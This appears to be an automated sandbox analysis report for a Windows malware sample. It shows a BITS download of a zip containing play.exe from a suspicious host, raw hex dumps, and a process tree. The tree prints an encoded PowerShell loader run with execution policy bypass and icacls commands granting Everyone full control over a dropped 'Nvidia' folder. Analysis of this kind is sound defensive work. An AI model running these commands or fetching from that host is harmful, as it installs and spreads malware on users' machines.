                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          If-Unmodified-Since: Wed, 18 Dec 2024 07:18:28 GMT
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: site.webmailcontabilidadecrx.net
                                                          2024-12-20 14:28:28 UTC267INHTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 14:28:28 GMT
                                                          Server: Apache
                                                          Upgrade: h2
                                                          Connection: Upgrade, close
                                                          Last-Modified: Wed, 18 Dec 2024 07:18:28 GMT
                                                          ETag: "83c3db-6298638673d7e"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 8635355
                                                          Content-Type: application/zip
                                                          2024-12-20 14:28:28 UTC7925INData Raw: 50 4b 03 04 14 00 00 00 08 00 3b 21 92 59 2a fe 82 59 45 c3 83 00 a0 87 86 00 08 00 00 00 70 6c 61 79 2e 65 78 65 ec bd 65 54 1c c1 df ef d9 b8 33 10 20 b8 bb bb 06 42 70 08 04 87 00 41 83 0d ee ee c1 19 3c b8 05 82 bb 7b b0 24 68 80 e0 16 3c 24 0c 04 77 4b 58 66 f8 df 73 9f 7d ce de bd 6f f6 d5 9e 3b e7 40 7f e7 f3 93 e9 ae 9e ae ae ea aa ee 79 65 90 08 20 01 00 80 fc f0 77 7f 0f 00 6d c0 e3 eb 05 f0 bf 7f 05 3f fc e1 52 77 e0 02 4d 18 63 b4 6d 08 2a 63 b4 da 60 1b 37 1a 67 57 27 6b 57 33 07 1a 73 33 47 47 27 77 9a b7 96 34 ae 1e 8e 34 36 8e 34 b2 6a 5a 34 0e 4e 16 96 5c 38 38 98 0c ff c9 a1 2e 07 00 2a 08 e8 00 6f ff 91 e5 ff c8 bb 0e 20 22 60 21 e0 32 01 b8 0f 6f 14 11 e0 cc 21 fd 27 00 e0 3d 08 1a e0 71 ed 60 1a 11 00 50 e1 d6 ff b9 04 12 f7 e1 1b 83
                                                          Data Ascii: PK;!Y*YEplay.exeeT3 BpA<{$h<$wKXfs}o;@ye wm?RwMcm*c`7gW'kW3s3GG'w4464jZ4N\88.*o "`!2o!'=q`P
                                                          2024-12-20 14:28:28 UTC8000INData Raw: a9 4d 1d 38 9d fd 5a fa 24 cd 33 3b 40 6d 79 dc 4a 00 c7 f7 21 b9 b1 bf 03 d8 e5 a3 a4 44 e6 8b c3 9c 39 2c 07 ec cf 5e ea ed 4f f5 09 e6 ea 66 c1 4d af d1 ea c1 92 81 ac 74 56 0f 6d ae 00 04 2c 00 76 1d 1e 80 e4 b5 21 c3 8e 2e 54 29 a9 8b 45 30 1f 57 f6 47 d8 49 1f 47 2a b8 af 1a 1a c3 f7 d0 c2 38 80 7d 7d 21 a8 e0 0a 9e 9c dd 5e 0b 06 c0 9a ff 4b 88 3d 03 d0 d9 d3 30 05 4a f0 78 13 04 ef ef 42 5b 0d 82 81 85 8f a7 e9 9e 2c 44 4a eb 39 83 ad b6 62 44 5a 33 1d b7 c8 4c 0d 75 83 43 9f ea 56 d4 3b 63 64 e2 25 56 9b 1b bf 57 5c 30 f1 ae 29 e2 06 5e 1c a0 3c 6b f5 20 a6 c3 91 a1 cf 75 28 b5 21 13 64 99 91 a1 1d b8 4a d1 35 49 dc 4c 71 28 31 51 07 36 00 74 f0 b3 d1 2b be 8a 91 bb 67 40 e0 6a 84 41 7d 82 af ac 5e ee 9b 93 6f 6d 68 b7 d3 cb d9 86 f5 4f bf a8 34
                                                          Data Ascii: M8Z$3;@myJ!D9,^OfMtVm,v!.T)E0WGIG*8}}!^K=0JxB[,DJ9bDZ3LuCV;cd%VW\0)^<k u(!dJ5ILq(1Q6t+g@jA}^omhO4
                                                          2024-12-20 14:28:28 UTC8000INData Raw: 8f 0f 22 e3 17 16 ac 4f 3a 24 d8 df 2e e2 c0 3a a6 5d 4e 74 4b 7b 56 9d 2a cb 66 a3 2b 7d ab 86 ca c7 8b ec c7 f9 13 0d d6 89 f3 fd 5f 51 1a df 68 0a 36 71 40 2d ba 9a 03 b5 3b 3e 43 f4 1b d4 28 6d 9a 45 4a 45 3e 15 f0 a2 77 ce 25 e7 ae 29 22 57 2f 48 76 df 4d 96 b0 8c ce 4d b6 4f da 48 71 6f 38 0a a5 d6 59 d7 22 05 9b 2e e4 13 21 cb 0b 31 22 f1 c6 ba 63 96 91 c9 e2 ac 89 23 ee 80 b9 bc 01 cc 49 d8 d9 af 96 32 b2 65 87 c6 cc 0f 08 19 84 cf ea 29 4b 48 6e b9 d8 01 33 ee b3 5f 59 45 a3 41 d1 4c b1 00 8b 68 74 f8 c9 98 b4 0b 19 80 5f 4a fd bc 8b 0d 9f d9 93 6f 22 52 65 85 34 6b 15 fd 74 c7 46 c6 1f 80 cf e1 da 11 8e 0e 80 1b 85 f8 f1 47 60 57 5b 27 42 e6 60 d7 84 77 be 87 bb 00 e0 1e 86 46 47 a8 42 b5 37 00 cd 64 0c 04 1e e7 4a 0a 3d 74 72 c8 16 b3 6a 77 76
                                                          Data Ascii: "O:$.:]NtK{V*f+}_Qh6q@-;>C(mEJE>w%)"W/HvMMOHqo8Y".!1"c#I2e)KHn3_YEALht_Jo"Re4ktFG`W['B`wFGB7dJ=trjwv
                                                          2024-12-20 14:28:28 UTC8000INData Raw: a2 be ad 20 ab c3 13 b4 e6 c4 15 2f f1 21 36 ea 5e 6f e5 ac 27 b7 99 f2 94 8a 06 9a 0e 0b 3c a7 56 c9 01 72 ea dc 53 6c 30 96 f0 f4 53 4c 6b 98 53 70 e2 dc bb 4c 57 2a 2c c3 aa e8 d2 4e 6e ff 24 cb a4 86 fa 2f 97 ec 30 0f 57 26 4c 59 63 c8 a6 32 e6 3f 28 eb 6c 07 52 3c 8c e1 85 b0 ee 10 93 15 a9 eb 46 ea 23 33 25 c0 48 9e 71 fa a8 85 6d 63 98 30 c9 8f 80 68 6a e3 90 57 8f 8e 8a b3 ab 91 1d 02 b9 e8 77 22 ec cf 6d 1f 3d cf 59 af a3 bd e2 cb bb bc 3d 04 7a f5 89 09 b1 1e 1d 17 e5 33 a8 5b 2d 63 0a 57 73 26 7d ec bf e1 1b e2 3b fa 0d ef 15 64 08 7f c1 20 84 be 79 0c 5c 04 51 27 b9 fb 59 15 93 1f ce 88 fc 8e e0 f9 06 63 b3 b2 44 e2 08 65 b8 37 c7 9c 27 85 44 23 30 32 88 c2 e3 78 30 d4 19 9d f3 6d 40 ab f4 8d b3 25 c6 a3 a3 e6 f7 2c d6 f1 90 b8 36 e8 e9 c0 fc
                                                          Data Ascii: /!6^o'<VrSl0SLkSpLW*,Nn$/0W&LYc2?(lR<F#3%Hqmc0hjWw"m=Y=z3[-cWs&};d y\Q'YcDe7'D#02x0m@%,6
                                                          2024-12-20 14:28:28 UTC8000INData Raw: 89 4f 13 99 db 4b fc 9a 22 3c 0f f3 f0 92 93 d6 fd a0 f1 85 80 34 66 4f 9d f0 08 b9 84 01 ca 4a c2 2f fd 50 25 b0 5d 34 8f 45 4f a3 a7 e1 6b 62 23 6b 4a 47 46 10 f1 73 b1 a7 89 6e cd c4 22 e6 74 09 be b1 21 43 1f ac 35 a8 83 7a e3 de b3 2c 1a 25 9c fc 7d 9f e6 46 d7 b6 39 56 8b a0 ca b3 26 fb e1 79 f1 dc 41 68 e1 69 10 67 ee 59 7a 5b 5e aa e6 fc e2 4f c3 cc 9f 9b 11 42 6b a2 39 a2 e3 f1 14 1a e6 1c 4d 74 4f 25 b5 dc 43 e4 46 9f 98 0d 0d d7 48 ea fc c5 5b 1a bf 22 c8 76 a0 ae 78 21 d8 51 d1 11 55 53 d4 6c 5f 40 73 e1 8d fc 43 24 06 b1 dd ae af 97 f6 3b a2 92 2d 6d 30 39 d1 6f c1 f0 53 8a b8 40 dd 90 7e 19 66 7d ea 97 cd 37 61 36 ed ae 2d 14 df be 18 66 a7 5d 88 e9 7c 2b 88 e2 31 50 68 d8 62 c1 a4 ac c3 78 13 de ab 29 c3 27 44 27 d6 27 63 9d 3c 8a 54 1b e4
                                                          Data Ascii: OK"<4fOJ/P%]4EOkb#kJGFsn"t!C5z,%}F9V&yAhigYz[^OBk9MtO%CFH["vx!QUSl_@sC$;-m09oS@~f}7a6-f]|+1Phbx)'D''c<T
                                                          2024-12-20 14:28:28 UTC8000INData Raw: eb 1a 75 9d 53 9a d6 2b 9d 1c d4 bf b7 8a ab 43 43 1f b1 0b cb 61 e9 c5 be 7a 18 1d c9 cd 3f 07 b0 b1 9e 8e 98 62 93 6f fd 0c 1e fc 98 e1 f2 75 f7 4a 25 e2 f9 ee 2e 95 82 01 2c b4 4b 9c 57 74 19 f2 1b 59 a3 a1 3a 7d 2c 76 f0 9f 96 f4 da 8f b0 cc dd 35 69 fe 2a 31 0c 75 37 7e 9b 5f 94 27 7b 31 7a 30 44 83 18 d9 9d aa 33 aa ec ca c2 27 b5 c2 22 7f 55 87 f7 c2 de ba 18 7d e6 95 f4 60 12 ac fc f6 99 75 52 1d 42 72 f8 2d fe 83 d5 a3 e7 93 33 cc 84 a8 fb cc 2f 32 57 28 5f be 5e 12 a6 38 6a 74 37 ac 1e 87 4f 0f f1 69 9c bd b3 4c 5a 1b c0 d6 38 fe 19 6c 4c 41 29 b2 5a d9 50 6e 4d f1 c8 b3 b4 b1 62 0c ef b9 ff 8b e7 93 d9 06 af 5f 6e f3 61 2c 5f a0 f0 30 25 48 5a f8 6f d2 6b 24 7c cf 6c 5d b0 53 f9 85 76 38 b9 7a 3d 92 4b 51 f1 7a bf 40 37 48 0e 13 cb a2 39 31 38
                                                          Data Ascii: uS+CCaz?bouJ%.,KWtY:},v5i*1u7~_'{1z0D3'"U}`uRBr-3/2W(_^8jt7OiLZ8lLA)ZPnMb_na,_0%HZok$|l]Sv8z=KQz@7H918
                                                          2024-12-20 14:28:28 UTC8000INData Raw: df ca 3e 3a 2c be 88 3e db 78 56 c1 4f ec a9 f3 bd 31 cd bc 20 2c 7d ec 8b 75 11 d9 b4 e0 f6 c8 d9 0b 8d ec c9 e7 b6 8f b7 39 71 fc 90 0f 49 3c 49 0c 3e 1b 38 09 12 b1 f4 a6 e2 80 31 47 bd aa ec f7 a2 91 18 e5 2d ce 52 86 df b6 31 53 72 91 a2 6b 2a 9b b0 ac 7a 83 95 9d e2 7a 6e 20 4f 2b 93 01 88 4e 87 97 ad 8e c3 07 8e aa 82 7a d6 14 dc d4 f0 78 d7 2e ca 0b 41 03 cb 23 0f 84 7b 81 f5 31 42 3a f1 bc 3e 29 af 40 fc 0c fc 14 c7 dd 46 12 fe 6d ac c3 bc 15 45 f1 72 61 f6 ed 0b f9 d1 e2 c0 78 09 5a c2 7e 63 3c 33 db 5e 92 27 ba f3 3e a2 2a e8 05 d9 50 c8 c7 ab 6a 3f 96 ce 0f fa c7 d5 71 b4 88 e4 f7 2b 3c a9 22 fb 6b 96 25 a5 bc 15 a2 85 74 1f 3f 9b 0d 7d 68 f8 dc e9 df d7 4b 2e 76 ab c8 02 a1 d3 d9 dd 8a 37 49 26 07 7e 14 37 89 8e 7d f9 9c 43 66 01 17 b6 3b f4
                                                          Data Ascii: >:,>xVO1 ,}u9qI<I>81G-R1Srk*zzn O+Nzx.A#{1B:>)@FmEraxZ~c<3^'>*Pj?q+<"k%t?}hK.v7I&~7}Cf;
                                                          2024-12-20 14:28:28 UTC8000INData Raw: 04 d2 70 92 61 da 7e f3 25 8c 8f c6 b4 47 86 1e 05 ad e7 fe 29 3c 14 12 88 de 6c 73 ef 07 ab 64 73 05 4c 7d 2c e8 51 05 66 61 3f b2 bd 80 43 41 e6 2f 55 21 31 9c 1c 15 18 26 19 11 ab 45 fe 41 66 d2 d6 e6 e8 dc a4 22 06 6e 6f 74 59 d1 8f c6 76 1c 65 d3 6d 25 6d f5 5e b8 ca eb 4b 1c 2c 13 3f a5 2a 0b b7 7d 7d 08 0a 0b 37 45 fc b1 95 83 f6 fb ac b5 9f 9b fe 16 8c c1 a2 78 be 16 c5 5c e5 83 c2 49 0f cc b0 9d bf 91 ef af 70 13 e3 50 1a d1 e0 33 ae 12 77 5b de a0 1a 51 4a 33 68 7b fe 7b ff a3 f6 85 1a 17 35 61 17 40 b1 3a 59 f9 e2 84 89 8b 76 2c d3 33 ae 52 ce ff 3b de 5b bc b7 be f7 79 12 ec 2d 96 12 75 b9 bd 1e 2d d1 02 6c 34 12 ec 63 83 41 55 41 45 4d 5f 2a b6 39 04 c1 18 3d a1 6e 7e 01 50 c8 e0 8a 1b 0b fe ea 3f 8f 1f 7f 7d 69 5e 9f 50 e8 dc 14 65 29 b3 8b
                                                          Data Ascii: pa~%G)<lsdsL},Qfa?CA/U!1&EAf"notYvem%m^K,?*}}7Ex\IpP3w[QJ3h{{5a@:Yv,3R;[y-u-l4cAUAEM_*9=n~P?}i^Pe)
                                                          2024-12-20 14:28:28 UTC8000INData Raw: c4 fc 5b 13 e3 6b e6 b6 4b 89 29 5c b7 91 8f 87 b7 63 e3 95 46 ec 14 b2 6f 4a 03 24 ea e8 5e 09 1f 0c 8e 3b d6 e2 e0 1a 88 6b aa 79 32 e0 67 6d 91 ad 8a ce 5e 51 a7 2b e1 22 a1 63 77 68 d8 67 a2 b2 2b a7 8f 7b 07 fd 4d 59 77 95 3b 5d fe 54 91 21 a3 7d 53 34 f2 db d2 04 4b e4 72 cd f0 87 36 a1 20 81 c5 f7 eb c1 6f dc 9f 0e 49 66 24 c2 0e 97 17 d2 22 c9 a9 b8 cd 84 da e9 94 74 16 31 35 42 66 68 9e 37 e8 94 f4 ee 8b 4f ef 43 7b 62 fe bc 16 b5 c8 62 c5 0e 81 84 b2 ce 39 00 b1 4a ba 4c 3c 15 db 4e 5b a7 d6 0d db d1 97 6e ee 1b 28 4f 32 09 34 88 32 06 4c d4 51 e3 6e 9d c7 b3 0e d2 99 71 ba 63 c9 fe 3c e5 d2 80 d6 25 ac 27 d8 ba 52 f1 c0 7e 17 97 b9 8e c4 a7 a0 56 97 60 74 c2 e2 87 5f 3e fa 22 44 57 64 8a e2 4a d2 95 fc 1b 6a 48 f4 6b 5e e9 6a e7 86 ca 46 96 33
                                                          Data Ascii: [kK)\cFoJ$^;ky2gm^Q+"cwhg+{MYw;]T!}S4Kr6 oIf$"t15Bfh7OC{bb9JL<N[n(O242LQnqc<%'R~V`t_>"DWdJjHk^jF3
                                                          2024-12-20 14:28:28 UTC8000INData Raw: 17 f5 71 1d ce 08 90 f2 39 5d f1 5d fe b5 36 b3 62 10 34 e5 42 6d aa 19 ab 81 04 e9 1a f7 e9 85 55 7a aa da af 11 bb 2c b7 8a c4 85 21 db b4 cc 38 e4 e7 52 d5 a3 85 7c e1 b7 6a a9 ba 7b e5 b2 ac bb e7 4d 94 b0 6e 23 61 6e 23 9a 2e c3 6d 45 62 ab 1b 33 1b fb 5b b3 18 d3 dd 64 df a5 5e 67 3e 13 9a ef 22 56 ab 20 e5 55 6b 1d a4 a0 f9 3b a9 fb 1f 56 d0 0a 48 28 2c 38 65 42 57 4a d9 9a 56 d8 a2 ce 1a 4b a0 b7 6a 8c cb f8 9f 9f 5a 0d 38 b0 fa b8 31 b6 1c 8f d8 dd d1 7b 20 70 ab 9f 1f 3c 58 8d 0c 4c 93 7e 3f 91 cf dd b1 82 7a 9b 44 ad 71 72 81 4b 07 fa ec d5 f3 0e e8 ef 72 c3 83 a5 1e 9e a3 b4 fd 22 45 82 6e d4 85 ee 04 f6 97 11 7f 1a 5f 2e 58 ab 09 e0 93 a1 07 a9 a7 d5 c5 8c eb cc 37 44 ca 63 3a 3a 90 88 a6 9e 84 58 9a 28 12 e6 26 3e 79 4c 4e a7 c7 12 cf c2 09
                                                          Data Ascii: q9]]6b4BmUz,!8R|j{Mn#an#.mEb3[d^g>"V Uk;VH(,8eBWJVKjZ81{ p<XL~?zDqrKr"En_.X7Dc::X(&>yLN


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:09:28:12
                                                          Start date:20/12/2024
                                                          Path:C:\Users\user\Desktop\RcFBMph6zu.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\RcFBMph6zu.exe"
                                                          Imagebase:0x4c0000
                                                          File size:133'536 bytes
                                                          MD5 hash:6B5C558A9C8728FDD47E7D8C20CAB5FF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:2
                                                          Start time:09:28:12
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==
                                                          Imagebase:0x7ff6e3d50000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:09:28:12
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:4
                                                          Start time:09:28:15
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\System32\icacls.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\icacls.exe" C:\Nvidia-48001 /grant Everyone:F /T /C
                                                          Imagebase:0x7ff7739a0000
                                                          File size:39'424 bytes
                                                          MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:09:28:16
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff717f30000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:09:28:19
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff7403e0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:09:28:43
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\System32\icacls.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\icacls.exe" C:\Nvidia-48001\Nvidia-48001.exe /grant Everyone:F /T /C
                                                          Imagebase:0x7ff7739a0000
                                                          File size:39'424 bytes
                                                          MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:09:28:43
                                                          Start date:20/12/2024
                                                          Path:C:\Nvidia-48001\Nvidia-48001.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Nvidia-48001\Nvidia-48001.exe"
                                                          Imagebase:0xd00000
                                                          File size:8'816'544 bytes
                                                          MD5 hash:D11828146FF9E2E340C555F9531CAC47
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:09:28:54
                                                          Start date:20/12/2024
                                                          Path:C:\Nvidia-48001\Nvidia-48001.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Nvidia-48001\Nvidia-48001.exe"
                                                          Imagebase:0xd00000
                                                          File size:8'816'544 bytes
                                                          MD5 hash:D11828146FF9E2E340C555F9531CAC47
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:true

                                                          Reset < >
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4658009808.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34200000_RcFBMph6zu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e3bc6a603fa0c2d5a4709b2974ff046d1e9d0847877ff38ea312fa68b35e1bd
                                                            • Instruction ID: d3c9165c56eb72a700482369c20ddfbafd7e8c418c4df46a69d6b447f2f96599
                                                            • Opcode Fuzzy Hash: 4e3bc6a603fa0c2d5a4709b2974ff046d1e9d0847877ff38ea312fa68b35e1bd
                                                            • Instruction Fuzzy Hash: 11A1C034B18A1E4FEB94EB6894A57B973E1FF8A304F500479D51ED3293DE29EC428740
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4658009808.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34200000_RcFBMph6zu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dab371e077a82431c6b14467e578ef6ad3d67d15ee5bdf6b4784e8a021b57939
                                                            • Instruction ID: 4c4414f16f49ed79dc54433810fcd2140957a7f516e9da1ab20ca77d2a1defb4
                                                            • Opcode Fuzzy Hash: dab371e077a82431c6b14467e578ef6ad3d67d15ee5bdf6b4784e8a021b57939
                                                            • Instruction Fuzzy Hash: 6151C430A0D7C85FE757DB78A8957A93FE0EF47311F0841AAE489C71A3CA695805C752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4658009808.00007FFD34200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34200000_RcFBMph6zu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a2fae7404359d6933ce95679d7e232ed06af18fd7e05cfb2bcaaab15ecdb2e0b
                                                            • Instruction ID: 598b8003bc5a20f6479b94ec53949665fd3f4cc743cf10664f5b69143f56ebaf
                                                            • Opcode Fuzzy Hash: a2fae7404359d6933ce95679d7e232ed06af18fd7e05cfb2bcaaab15ecdb2e0b
                                                            • Instruction Fuzzy Hash: 1531A131A08A1C8FEB58DF58D89A7FD77E4EB59311F00012EE45AD3292DA74A8018B91

                                                            Execution Graph

                                                            Execution Coverage:3%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:14.3%
                                                            Total number of Nodes:42
                                                            Total number of Limit Nodes:1
                                                            execution_graph 14402 7ffd3421b48d 14403 7ffd3421b493 ObjectStublessClient4 14402->14403 14405 7ffd3421b548 14403->14405 14415 7ffd342170c2 14416 7ffd342170ca 14415->14416 14421 7ffd34217b63 14416->14421 14422 7ffd34217192 14416->14422 14423 7ffd34214f18 14416->14423 14417 7ffd34214f18 CoCreateInstance 14417->14422 14419 7ffd34217b52 14420 7ffd34214f18 CoCreateInstance 14419->14420 14419->14422 14420->14421 14421->14417 14421->14422 14423->14419 14424 7ffd3421c450 14423->14424 14429 7ffd342183a0 14424->14429 14426 7ffd3421c48f 14435 7ffd34218a90 14426->14435 14428 7ffd3421c512 14428->14419 14430 7ffd342183fb 14429->14430 14431 7ffd342183b2 14429->14431 14430->14426 14432 7ffd342183bb 14431->14432 14433 7ffd34218674 CoCreateInstance 14431->14433 14432->14426 14434 7ffd342186db 14433->14434 14434->14426 14436 7ffd34218aeb 14435->14436 14438 7ffd34218aa2 14435->14438 14436->14428 14437 7ffd34218aab 14437->14428 14438->14437 14439 7ffd342183a0 CoCreateInstance 14438->14439 14440 7ffd34218bf8 14439->14440 14441 7ffd34218a90 CoCreateInstance 14440->14441 14442 7ffd34218cc9 14441->14442 14442->14428 14443 7ffd34219144 14444 7ffd3421914d ObjectStublessClient3 14443->14444 14446 7ffd3421920a 14444->14446 14406 7ffd342184d8 14408 7ffd342184df 14406->14408 14407 7ffd3421852c 14408->14407 14409 7ffd34218674 CoCreateInstance 14408->14409 14410 7ffd342186db 14409->14410 14411 7ffd3421ba99 14412 7ffd3421ba9f IUnknown_QueryInterface_Proxy 14411->14412 14414 7ffd3421bb58 14412->14414 14447 7ffd3421888c 14448 7ffd34218895 CoSetProxyBlanket 14447->14448 14450 7ffd3421896e 14448->14450

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ffd34216fb6-7ffd3421702d 2 7ffd3421702f-7ffd3421703f 0->2 3 7ffd34217040-7ffd34217076 call 7ffd34216828 call 7ffd34214de8 0->3 10 7ffd34217078-7ffd34217088 call 7ffd342151f8 3->10 11 7ffd3421708b-7ffd34217094 3->11 10->11 13 7ffd3421711f-7ffd34217134 call 7ffd34214e18 11->13 14 7ffd3421709a-7ffd342170be 11->14 18 7ffd34217139-7ffd34217149 13->18 14->13 19 7ffd34217168-7ffd34217190 call 7ffd34215248 18->19 20 7ffd3421714b-7ffd34217163 call 7ffd34215200 call 7ffd34214f40 18->20 26 7ffd34217192-7ffd342171f2 call 7ffd34215058 19->26 27 7ffd342171f7-7ffd34217203 19->27 20->19 59 7ffd34217d59-7ffd34217d72 call 7ffd34217e6f 26->59 29 7ffd34217291-7ffd342172b8 call 7ffd34214f20 27->29 30 7ffd34217209-7ffd3421722d 27->30 35 7ffd342172c6 29->35 36 7ffd342172ba-7ffd342172c4 29->36 30->29 38 7ffd342172cb-7ffd342172cd 35->38 36->38 39 7ffd342172cf-7ffd342172e1 call 7ffd34214f30 38->39 40 7ffd342172e6-7ffd342172f1 38->40 39->40 43 7ffd342172f3-7ffd34217304 call 7ffd34214f50 40->43 44 7ffd34217309-7ffd34217314 40->44 43->44 46 7ffd34217316-7ffd34217327 call 7ffd34214f60 44->46 47 7ffd3421732c-7ffd34217337 44->47 46->47 50 7ffd3421734f-7ffd3421735a 47->50 51 7ffd34217339-7ffd3421734a call 7ffd34214f70 47->51 52 7ffd34217372-7ffd3421737d 50->52 53 7ffd3421735c-7ffd3421736d call 7ffd34214e90 50->53 51->50 57 7ffd3421737f-7ffd34217390 call 7ffd34214eb0 